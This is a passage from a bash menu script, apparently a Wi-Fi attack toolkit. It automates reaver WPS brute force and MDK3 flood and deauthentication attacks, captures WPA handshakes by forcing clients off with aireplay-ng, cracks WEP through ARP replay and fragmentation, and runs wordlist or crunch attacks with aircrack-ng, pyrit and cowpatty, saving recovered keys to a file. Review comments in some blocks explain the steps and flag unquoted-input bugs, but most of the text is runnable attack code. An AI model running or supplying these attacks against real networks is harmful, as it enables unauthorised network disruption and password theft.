  682. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  683. rm reaver.txt
  684. echo ""
  685. fi ;;
  686.  
  687. 2)
  688. clear
  689. echo $RED"Current Reaver Attack Command:"$STAND
  690. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  691. echo ""
  692. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
  693. echo ""
  694. echo $RED"New Reaver Attack Command:"$STAND
  695. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
  696. echo ""
  697. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  698. reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  699. rm reaver.txt
  700.  
  701. ################## START OF: MDK3 ACCESS POINT RESET ############################################
  702.  
  703. echo ""
  704. echo ""
  705. echo $GREEN"Would you like to try to reset the access point? Y/n"$STAND
  706. read a
  707. if [[ $a == "Y" || $a == "y" || $a = "" ]]; then
  708.  
  709. echo "Press the [Enter] button 3 times on the kismet screen, wait 5-10 seconds then press Ctrl+c."
  710. kismet ncsource=mon0:hop=true
  711. sleep 5
  712.  
  713. echo ""
  714. echo $RED"Target essid:$STAND $AP_essid"
  715. echo ""
  716. read -p $GREEN"Please input the above target essid.$STAND" MDK3_Target
  717. echo ""
  718. cat $HOME/scrypta/temp/*.nettxt | sed -n "/$MDK3_Target/,/Channel/p"
  719.  
  720. echo 'AP_bssid="'"$AP_bssid"'"' > MDK3_APbssid.txt
  721. sleep 1
  722. echo 'AP_channel="'"$AP_channel"'"' > MDK3_APchannel.txt
  723. sleep 1
  724. cat MDK3_APbssid.txt | sed 's/AP_bssid=//' | sed 's/"//g' > MDK3_APbssid_1.txt
  725. sleep 1
  726. cat MDK3_APchannel.txt | sed 's/AP_channel=//' | sed 's/"//g' > MDK3_APchannel_1.txt
  727. sleep 1
  728. echo $AP_bssid > Blacklist.txt
  729.  
  730. echo ""
  731. echo $GREEN"Does the access point support WAP+TKIP?"
  732. echo $GREEN"[1]$BLUE = Yes."
  733. echo $GREEN"[2]$BLUE = No."
  734. echo $GREEN"1 or 2?"$STAND
  735. read option
  736.  
  737. if [[ $option == "1" ]]; then
  738.  
  739. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
  740.  
  741. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  742. xterm -geometry 111x24+650+0 -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  743. echo ""
  744. echo ""
  745. fi
  746.  
  747. echo $GREEN"Did the access point have any clients connected to it?"
  748. echo $GREEN"[1]$BLUE = Yes."
  749. echo $GREEN"[2]$BLUE = No."
  750. echo $GREEN"1 or 2?"$STAND
  751. read MDK3_ClientChoice
  752.  
  753. if [[ $MDK3_ClientChoice == "1" ]]; then
  754.  
  755. echo '#!/bin/bash
  756.  
  757. RED=$(tput setaf 1 && tput bold)
  758. GREEN=$(tput setaf 2 && tput bold)
  759. STAND=$(tput sgr0)
  760.  
  761. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  762. sleep 1
  763. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  764. echo ""
  765. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  766.  
  767. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  768. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  769. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  770. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid -j" &
  771.  
  772. while :
  773. do
  774. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  775. sleep 20
  776. kill `pidof airodump-ng`
  777. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  778.  
  779. fi
  780.  
  781. if [[ $MDK3_ClientChoice == "2" ]]; then
  782.  
  783. echo '#!/bin/bash
  784.  
  785. RED=$(tput setaf 1 && tput bold)
  786. GREEN=$(tput setaf 2 && tput bold)
  787. STAND=$(tput sgr0)
  788.  
  789. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  790. sleep 1
  791. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  792. echo ""
  793. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  794.  
  795. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  796. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  797. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  798. xterm -geometry 100x10+675+345 -e "mdk3 mon0 m -t $AP_bssid" &
  799.  
  800. while :
  801. do
  802. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  803. sleep 20
  804. kill `pidof airodump-ng`
  805. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  806.  
  807. fi
  808. fi
  809.  
  810. if [[ $option == "2" ]]; then
  811.  
  812. echo '#!/bin/bash
  813.  
  814. RED=$(tput setaf 1 && tput bold)
  815. GREEN=$(tput setaf 2 && tput bold)
  816. STAND=$(tput sgr0)
  817.  
  818. AP_bssid=$(cat $HOME/scrypta/temp/MDK3_APbssid_1.txt)
  819. sleep 1
  820. AP_channel=$(cat $HOME/scrypta/temp/MDK3_APchannel_1.txt)
  821. echo ""
  822. echo $GREEN"Press Ctrl+c on this screen to terminate the MDK3 attack and continue.$STAND"
  823.  
  824. xterm -geometry 100x10+675+0 -e "mdk3 mon0 a -a $AP_bssid -m" &
  825. xterm -geometry 100x10+675+185 -e "mdk3 mon0 d -b $HOME/scrypta/temp/Blacklist.txt -c $AP_channel" &
  826. xterm -geometry 100x10+675+345 -e "mdk3 mon0 b -t $AP_bssid" &
  827.  
  828. while :
  829. do
  830. xterm -geometry 95x20+0+500 -e "airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0" &
  831. sleep 20
  832. kill `pidof airodump-ng`
  833. done' > $HOME/scrypta/temp/MDK3_AP_Reset.sh
  834.  
  835. fi
  836.  
  837. sleep 1
  838. chmod +x $HOME/scrypta/temp/MDK3_AP_Reset.sh
  839. sleep 1
  840. Eterm -g 100x10-640-500 --cmod "red" -T "Main Window - Press Ctrl+c to exit MDK3" -e sh -c "$HOME/scrypta/temp/MDK3_AP_Reset.sh; bash"
  841. rm $HOME/scrypta/temp/Blacklist.txt
  842.  
  843. if [[ $a == "N" || $a == "n" ]]; then
  844. echo ""
  845. fi
  846. fi
  847. ################## END OF: MDK3 ACCESS POINT RESET ############################################
  848.  
  849. echo "" ;;
  850. 0) exit 0;;
  851. *) echo "";
  852. echo "Press [Enter] to continue. . ." ; read ;;
  853. esac
  854.  
  855. ############## End Of Reaver Attacks And Store Recovered Passkey ##############
  856.  
  857. ######################## LOOP ############################################
  858.  
  859. clear
  860. read -s -n1 -p $RED"Choose another target or return to the main menu:$GREEN
  861. y $BLUE= Choose another target.$GREEN
  862. n $BLUE= Return to main menu.$GREEN
  863. Please choose y/n?$STAND: " CONFIRM
  864. case $CONFIRM in
  865. n|N|NO|no|No)
  866. break ;;
  867. *) echo "" ;;
  868. esac
  869. done
  870.  
  871. ############## End Of Loop Section ##############
  872.  
  873. ############## Start Of Cleanup ##############
  874.  
  875. rm *.txt
  876. rm *.py
  877. cd
  878. ############## End Of Cleanup ##############
  879. ;;
  880.  
  881. ###### [4] Capture WPA/WPA2 Handshake ######
  882. 4)
# [4] Capture a WPA/WPA2 handshake: scan for WPA networks, let the operator
# pick an AP and one of its clients, record traffic for that AP and send
# de-authentication frames; the capture is moved to Captured_Handshakes/ at the end.
# Reads: HOME, RED, GREEN, BLUE, STAND. Uses the mon0 interface throughout.
# NOTE(review): a failed cd is not checked, so the relative-path writes and the
# rm/mv globs at the end of this block would run in whatever directory is current.
cd $HOME/scrypta/temp
clear
echo $RED"Scan for possible targets."
echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."
read -p $GREEN"Press [Enter] to start the scan.$STAND"

# -l -lf make xterm log the terminal output to WPA_Scan.txt; the pipelines
# below parse that screen log rather than a structured airodump-ng output file.
xterm -geometry 111x35+650+0 -l -lf WPA_Scan.txt -e airodump-ng --encrypt WPA mon0

# Keep the last screen refresh (from the final 'CIPHER' header line onward), stop at
# the STATION table, keep rows containing "PSK", replace the first '.' in each row
# with a space and drop hidden-SSID rows ("<length: 0>").
tac WPA_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | grep "PSK" | sed -r -e 's/\./ /' | sed '/<length: 0>/d' > temp0.txt
# Build the numbered menu: strip a fixed-width prefix from each row, number the rows,
# keep the number plus the first remaining field (presumably the ESSID - TODO confirm)
# and pad single-digit numbers with a leading space.
cat temp0.txt | sed 's/^..........................................................................//' | nl -ba -w 1 -s ': ' | awk '{ print $1, $2 }' | sed 's/^1:/ 1:/' | sed 's/^2:/ 2:/' | sed 's/^3:/ 3:/' | sed 's/^4:/ 4:/' | sed 's/^5:/ 5:/' | sed 's/^6:/ 6:/' | sed 's/^7:/ 7:/' | sed 's/^8:/ 8:/' | sed 's/^9:/ 9:/' > PresentedAPs.txt
sleep 1

PresentedAPs=$(cat PresentedAPs.txt)
sleep 1
echo ""
echo "Please choose an AP"
echo ""
echo "$PresentedAPs"
echo ""
read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
echo ""

# NOTE(review): the typed value is spliced into the sed script unvalidated; anything
# other than a line number is interpreted as sed syntax.
Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
# Whitespace-split fields of the chosen row: 11 -> ESSID, 1 -> BSSID, 6 -> channel
# (column positions depend on airodump-ng's screen layout - TODO confirm).
# NOTE(review): the ESSID is chosen by whoever operates the access point, so these
# values are untrusted input; below they are expanded unquoted, placed inside
# xterm -e command strings and used in a file name. An ESSID containing whitespace
# is also cut at the first blank by awk.
AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $11 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`

clear
echo $RED"Chosen Target Details."$STAND
echo $RED"Aceess Point essid$STAND: $AP_essid"
echo $RED"Aceess Point bssid$STAND: $AP_bssid"
echo $RED"Aceess Point Channel Number$STAND: $AP_channel"

echo ""
echo $RED"Scan for clients connected to$STAND $AP_essid"
echo $RED"Once you have identified the client you wish to target press Ctrl-C to exit"$STAND
read -p $GREEN"Press [Enter] to start the scan."$STAND

# Second scan, locked to the chosen channel and BSSID, again logged through xterm.
xterm -geometry 100x20+650+0 -l -lf WPA_ClientScan.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0

# One pass per de-authentication attempt; the loop ends when the operator answers "n".
while true
do

# Second column of the last screen refresh, minus the first six lines and the last
# line: the list of station MAC addresses offered to the operator.
tac WPA_ClientScan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -r -e 's/\./ /' | sed '$d' | sed '1,6d' | awk '{ print $2 }' > temp1.txt
cat temp1.txt | nl -ba -w 1 -s ': ' > ConnectedClientsScan.txt
ConnectedClientsScan=$(cat ConnectedClientsScan.txt)

sleep 2
echo ""
echo $RED"Please choose a client MAC address"$STAND
echo ""
echo "$ConnectedClientsScan"
echo ""
read -p $GREEN"Please input the number of your chosen client MAC address:$STAND " Chosen_Client
echo ""

sleep 1
Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
echo ""
echo $RED"Chosen Client MAC Address."$STAND
echo "$Chosen_Client_MAC"
echo ""

# Background capture for the chosen AP; -w psk makes airodump-ng write its output
# files with the prefix "psk" in the current directory. A new capture window is
# started on every pass of the loop.
xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --ignore-negative-one -w psk --bssid $AP_bssid mon0" &

echo $RED"Choose an option:"
echo $GREEN"[1]$BLUE = De-Authenticate The Chosen Client?."
echo $GREEN"[2]$BLUE = De-Authenticate All Connected Clients?."
echo $GREEN"[3]$BLUE = Choose another client."
echo $GREEN"1, 2, or 3?"$STAND
read option

# aireplay-ng -0 10 sends de-authentication frames (count 10), either to one client
# (-c) or to every client of the AP. These are management frames that are only
# authenticated when 802.11w Protected Management Frames is in use, so networks that
# require PMF (mandatory in WPA3) do not act on forged ones, and a wireless IDS can
# alert on de-authentication bursts like this.
if [[ $option == "1" ]]; then
echo "De-Authenticate a single client."
xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid -c $Chosen_Client_MAC mon0"
fi
if [[ $option == "2" ]]; then
echo "De-Authenticate all connected clients."
xterm -geometry 100x20+675+350 -e "aireplay-ng -0 10 --ignore-negative-one -a $AP_bssid mon0"
fi
# Option 3 only re-reads the client choice from the list already collected.
if [[ $option == "3" ]]; then
clear
echo "Please choose a client"
echo ""
echo "$ConnectedClientsScan"
echo ""
read -p $GREEN"Please input the number of the chosen client:$STAND " Chosen_Client
echo ""
Chosen_Client_MAC=$(cat temp1.txt | sed -n ""$Chosen_Client"p")
echo ""
echo "Chosen Target Details."
echo "$Chosen_Client_MAC"
sleep 4
fi

clear
echo -n $GREEN"Re-send de-auth request or choose another client? (y or n)$STAND: "
read -e CONFIRM
case $CONFIRM in
n|N|NO|no|No)
break ;;
*) echo "" ;;
esac
done

# Remove the scan logs and menu files created above.
rm WPA_Scan.txt
rm temp0.txt
rm PresentedAPs.txt

rm WPA_ClientScan.txt
rm temp1.txt
rm ConnectedClientsScan.txt

# pidof returns every airodump-ng process on the host, not only the ones started here.
kill `pidof airodump-ng`
rm *.csv
rm *.netxml
# NOTE(review): the destination name is built from the unquoted, AP-supplied ESSID,
# and with more than one *.cap file present mv is given several sources and a
# non-directory target.
mv *.cap $HOME/scrypta/Captured_Handshakes/$AP_essid.cap
cd
  1001. ;;
  1002.  
  1003. ###### [5] WEP Attacks ######
  1004. 5)
# [5] WEP attacks: scan for WEP networks, pick an AP, then follow one of two paths
# depending on whether a client is associated; a recovered key is appended to
# $HOME/scrypta/Recovered-WPA-Passkeys.txt.
# Reads: HOME, RED, GREEN, STAND, mon0mac. Uses the mon0 interface throughout.
# WEP is deprecated; moving the network to WPA2/WPA3 is the mitigation for
# everything this block does.
# NOTE(review): a failed cd is not checked before the relative-path writes and rm globs below.
cd $HOME/scrypta/temp
clear
echo $RED"Scan for possible targets."$STAND
echo $GREEN"Once you've identified a target press Ctrl-C to exit the scan and to continue."$STAND
read -p $GREEN"Press [Enter] to start the scan.$STAND"

# xterm -l -lf logs the scan window to WEP_Scan.txt; that screen log is parsed below.
xterm -geometry 111x35+650+0 -l -lf WEP_Scan.txt -e airodump-ng --encrypt WEP mon0

sleep 1
# Last screen refresh up to the STATION table, minus its first two lines, its last
# line and hidden-SSID rows ("<length: 0>").
tac WEP_Scan.txt | grep 'CIPHER' -m 1 -B 9999 | tac | sed -n '/STATION/q;p' | sed '1,2d' | sed '$d' | sed '/<length: 0>/d' > temp0.txt
sleep 1
# Numbered menu built from field 10 of each row (the same field read as AP_essid below).
PresentedAPs=$(cat temp0.txt | awk '{ print $10 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//' )

clear
echo $RED"Please choose a target"$STAND
echo ""
echo "$PresentedAPs"
echo ""
read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_AP
echo ""

# NOTE(review): the typed value goes into the sed script unvalidated.
Chosen_AP_Details=$(cat temp0.txt | sed -n ""$Chosen_AP"p")
# Whitespace-split fields of the chosen row: 10 -> ESSID, 1 -> BSSID, 6 -> channel
# (column positions depend on airodump-ng's screen layout - TODO confirm).
# NOTE(review): the ESSID is set by the access point's operator, i.e. untrusted
# input; it is later expanded unquoted and inside xterm -e command strings.
AP_essid=`echo "$Chosen_AP_Details" | awk '{ print $10 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
AP_bssid=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`
AP_channel=`echo "$Chosen_AP_Details" | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`

clear
echo $RED"Chosen Target Details."$STAND
echo $RED"Aceess Point essid$STAND: $AP_essid"
echo $RED"Aceess Point bssid$STAND: $AP_bssid"
echo $RED"Aceess Point Channel Number$STAND: $AP_channel"
echo ""
echo $RED"Scan for clients connected to$STAND $AP_essid."
echo $RED"When you've identified a target press Ctrl-C to exit.$STAND"
read -p $GREEN"Press [Enter] to start the scan."$STAND

sleep 1
xterm -geometry 111x35+650+0 -l -lf WEP_ClientScan.txt -e airodump-ng -c $AP_channel --bssid $AP_bssid mon0

echo ""
echo $GREEN"Did the access point have any clients connected to it?. (y/n)$STAND"
read answer

# Path 1: a client is associated with the AP.
if [[ $answer == "y" || $answer == "Y" ]]; then

# Second column of the rows after the last STATION header, minus the first two
# lines and the last line.
tac WEP_ClientScan.txt | grep 'STATION' -m 1 -B 9999 | tac | awk '{ print $2 }' | sed '1,2d' | sed '$d' > ClientScan.txt
sleep 2
PresentedClients=$(cat ClientScan.txt | awk '{ print $1 }' | nl -ba -w 1 -s ': ' | sed 's/^[ \t]*//;s/[ \t]*$//')

sleep 2
clear
echo "Please choose a client"
echo ""
echo "$PresentedClients"
echo ""

read -p $GREEN"Please input the number of your chosen target:$STAND " Chosen_Client
echo ""

Chosen_ClientMAC=$(cat ClientScan.txt | sed -n ""$Chosen_Client"p")
# NOTE(review): ClientMAC is read from field 1 of Chosen_AP_Details (the same
# expression as AP_bssid); Chosen_ClientMAC is not read again in this block.
ClientMAC=`echo "$Chosen_AP_Details" | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//'`

echo $RED"You've chosen:"
echo $RED"Client$STAND: $ClientMAC"
echo ""

while true
do

read -p $GREEN"Press [Enter] to start the attack.$STAND"
# Three helper windows: a capture written with the prefix "capture", an
# aireplay-ng -1 (fake authentication) run and an aireplay-ng -3 (ARP request
# replay) run, both using $ClientMAC as the source address (-h).
xterm -e "airodump-ng -w capture --bssid $AP_bssid -c $AP_channel mon0" &
xterm -e "sleep 1 && aireplay-ng -1 0 -e $AP_essid -a $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
xterm -e "sleep 1 && aireplay-ng -3 -b $AP_bssid -h $ClientMAC --ignore-negative-one mon0" &
echo $RED"NOTE: There's a 60 second delay before Aircrack-ng starts the cracking process."
echo "Please wait for aircrack to start...$STAND"
sleep 60
# -l makes aircrack-ng write a recovered key to WEPpasskey.txt.
aircrack-ng -b $AP_bssid *.cap -l WEPpasskey.txt
sleep 2
passkey=$(cat WEPpasskey.txt)
sleep 2
# pidof returns every xterm on the host, including ones not started by this script.
kill `pidof xterm`
echo ""
echo $RED"Target essid$STAND: $AP_essid"
echo $RED"Target bssid$STAND: $AP_bssid"
echo $RED"Target Pass-Key$STAND: $passkey"

echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo $RED"Please re-enter information$STAND" ;;
esac
done

# The key is appended in cleartext to a file in the home directory; the file is
# created with whatever permissions the current umask gives.
echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
cd
fi
# Path 2: no client is associated; the monitor interface's own MAC (mon0mac, set
# outside this block) is used as the source address.
if [[ $answer == "n" || $answer == "N" ]]; then
while true
do

echo $RED"Starting packet capture, press Ctrl+c to end it"$STAND
# $! is the PID of the xterm wrapper, which is what the kill further down signals.
xterm -geometry 100x20+675+0 -e "airodump-ng -c $AP_channel --bssid $AP_bssid --ivs -w capture mon0" & AIRODUMPPID=$!
sleep 2
# aireplay-ng -1: fake authentication.
aireplay-ng -1 0 -a $AP_bssid -h $mon0mac --ignore-negative-one mon0
sleep 2
# aireplay-ng -5: fragmentation attack; the *.xor file consumed below is expected
# to come from this step.
aireplay-ng -5 -b $AP_bssid -h $mon0mac --ignore-negative-one mon0
sleep 2
# packetforge-ng -0 builds an ARP packet from the *.xor file and writes it to
# "arp-packet"; aireplay-ng -2 -r then replays that file.
packetforge-ng -0 -a $AP_bssid -h $mon0mac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet mon0
sleep 2
xterm -geometry 100x20+675+100 -e "aireplay-ng -2 -r arp-packet --ignore-negative-one mon0" & AIREPLAYPID=$!
sleep 2

echo ""
echo $GREEN"Attempt to crack the passkey if the data increases, Is the data increasing?. (y/n)$STAND"
read option

if [[ $option == "y" ]]; then
aircrack-ng -n 128 -b $AP_bssid *.ivs -l WEPpasskey.txt
passkey=$(cat WEPpasskey.txt)
rm WEPpasskey.txt
kill ${AIRODUMPPID}
kill ${AIREPLAYPID}
rm *.ivs
rm *.cap
rm *.xor
rm arp-packet
# Cleartext append to the same log file as in path 1.
echo AP ESSID: $AP_essid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
echo WEP Passkey: $passkey >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt
fi

echo -n $GREEN"Was the attack successful? (y or n)$STAND: "
read -e CONFIRM
case $CONFIRM in
y|Y|YES|yes|Yes)
break ;;
*) echo ""
esac
done
fi
cd
  1152. ;;
  1153.  
  1154. ###### [6] Attack Handshake.cap Files ######
  1155. 6)
  1156. clear
  1157. echo $RED"###################################"
  1158. echo "# #"
  1159. echo "# With a wordlist #"
  1160. echo "# $GREEN[1]$BLUE = Aircrack-ng $RED#"
  1161. echo "# $GREEN[2]$BLUE = Pyrit $RED#"
  1162. echo "# $GREEN[3]$BLUE = Pyrit + Cowpatty $RED#"
  1163. echo "# #"
  1164. echo "# Without a wordlist #"
  1165. echo "# $GREEN[4]$BLUE = Crunch + Aircrack-ng $RED#"
  1166. echo "# $GREEN[5]$BLUE = Crunch + Pyrit $RED#"
  1167. echo "# $GREEN[6]$BLUE = Crunch + Pyrit + Cowpatty $RED#"
  1168. echo "# #"
  1169. echo "###################################"
  1170. echo
  1171. echo $GREEN"Choose an option?"$STAND
  1172. read option
# Option 1: wordlist attack on a capture file with aircrack-ng. Prompts for the
# capture and wordlist paths, echoes the command line, then runs it. Only
# passphrases present in the wordlist can be found this way.
# NOTE(review): both paths are expanded unquoted, so a path containing spaces or
# glob characters is split or expanded before aircrack-ng sees it, and a value
# starting with "-" is read as an option.
if [[ $option == "1" ]]; then
clear
echo $RED
echo "############################################"
echo "# #"
echo "#$STAND Attack Capture File Using A Wordlist $RED#"
echo "#$STAND (Aircrack-ng) $RED#"
echo "# #"
echo "############################################"
echo
echo $RED"eg: /root/Desktop/sky12345.cap"
read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
echo
echo $RED"eg: /root/Desktop/wordlist.txt"
read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
clear
# Chosen user input options
############################
echo
echo $RED"You've chosen:"
echo "=============="
echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
echo
echo $RED"Commands to launch:"
echo "==================="
echo $STAND"aircrack-ng -w $WordlistNameLocation $CapNameLocation"
echo
# Launch chosen commands/options
#################################
read -p $GREEN"Press enter to start"$STAND
clear
aircrack-ng -w $WordlistNameLocation $CapNameLocation
fi
# Option 2: wordlist attack on a capture file with pyrit (attack_passthrough).
# Prompts for the AP's BSSID, the capture path and the wordlist path, echoes the
# command line, then runs it.
# NOTE(review): all three values are expanded unquoted on the pyrit command line.
if [[ $option == "2" ]]; then
clear
echo $RED
echo "############################################"
echo "# #"
echo "#$STAND Attack Capture File Using A Wordlist $RED#"
echo "#$STAND (Pyrit) $RED#"
echo "# #"
echo "############################################"
echo
echo $RED"eg: 00:11:22:33:44:55"
read -p $GREEN"Access Point bssid$STAND: " bssid
echo
echo $RED"eg: /root/Desktop/sky12345.cap"
read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
echo
echo $RED"eg: /root/Desktop/wordlist.txt"
read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
clear
# Chosen user input options
############################
echo
echo $RED"You've chosen:"
echo "=============="
echo $RED"Access Point bssid$STAND: $bssid"
echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
echo
echo $RED"Commands to launch:"
echo "==================="
echo $STAND"pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough"
echo
# Launch chosen commands/options
#################################
read -p $GREEN"Press enter to start"$STAND
clear
pyrit -r $CapNameLocation -i $WordlistNameLocation -b $bssid attack_passthrough
fi
# Option 3: wordlist attack using a pyrit | cowpatty pipeline. The wordlist is
# streamed through pyrit's passthrough mode for the given ESSID and cowpatty checks
# the result against the capture file.
# NOTE(review): the ESSID and both paths are expanded unquoted in the pipeline.
if [[ $option == "3" ]]; then
clear
echo $RED
echo "############################################################################"
echo "# #"
echo "#$STAND Attack Capture File Using A Wordlist $RED#"
echo "#$STAND (Pyrit + Cowpatty) $RED#"
echo "# #"
echo "############################################################################"$STAND
echo
echo $RED"eg: sky12345"
read -p $GREEN"Access Point essid$STAND: " essid
echo
echo $RED"eg: /root/Desktop/sky12345.cap"
read -p $GREEN"Capture file location, name, extension$STAND: " CapNameLocation
echo
echo $RED"eg: /root/Desktop/wordlist.txt"
read -p $GREEN"Wordlist location, name, extension$STAND: " WordlistNameLocation
clear
# Chosen user input options
############################
echo
echo $RED"You've chosen:"
echo "=============="
echo $RED"Access Point essid$STAND: $essid"
echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
echo $RED"Wordlist location, name, extension$STAND: $WordlistNameLocation"
echo
echo $RED"Commands to launch:"
echo "==================="
echo $STAND"cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
echo
# Launch chosen commands/options
#################################
read -p $GREEN"Press enter to start"$STAND
clear
cat $WordlistNameLocation | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
fi
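# Option 4: generated-candidate attack on a capture file (crunch | aircrack-ng).
# Prompts for a character set, a minimum and maximum length, optional extra crunch
# arguments, the ESSID and the capture path, echoes the command line, then runs it.
# The number of candidates grows exponentially with length and character-set size.
# Reads: option, RED, GREEN, STAND.
# Writes: CharacterSet, PasswordLengthMin, PasswordLengthMax,
#         OptionalCrunchOptions, essid, CapNameLocation.
# NOTE(review): every prompted value is expanded unquoted on the command line;
# for OptionalCrunchOptions that splitting is what turns the typed text into
# separate arguments, for the other values it also splits on embedded spaces.
if [[ $option == "4" ]]; then
  # Was "lear", which is not a command: the screen was never cleared here and the
  # shell printed a "command not found" error above the banner.
  clear
  echo $RED
  echo "############################################################################"
  echo "# #"
  echo "#$STAND Attack a Capture file without using a wordlist file $RED#"
  echo "#$STAND (Crunch + Aircrack-ng) $RED#"
  echo "# #"
  echo "############################################################################"$STAND
  echo
  echo $RED"eg: abcdef23456789"
  read -p $GREEN"Input the characters, digits, or symbols to be used$STAND: " CharacterSet
  echo
  echo $RED"eg: 10"
  read -p $GREEN"Input the minimum length of the passwords$STAND: " PasswordLengthMin
  echo
  echo $RED"eg: 10"
  read -p $GREEN"Input the maximum length of the passwords$STAND: " PasswordLengthMax
  echo
  echo $RED"eg:"
  echo $RED"-d <Number> = Limits the amount of times a character, digit, or symbol can appear next to its self."
  echo $RED"-s XXXXXXXXXX = Start point."
  read -p $GREEN"Input any other optional crunch commands?$STAND: " OptionalCrunchOptions
  echo
  echo $RED"eg: sky12345"
  read -p $GREEN"Access Point essid$STAND: " essid
  echo
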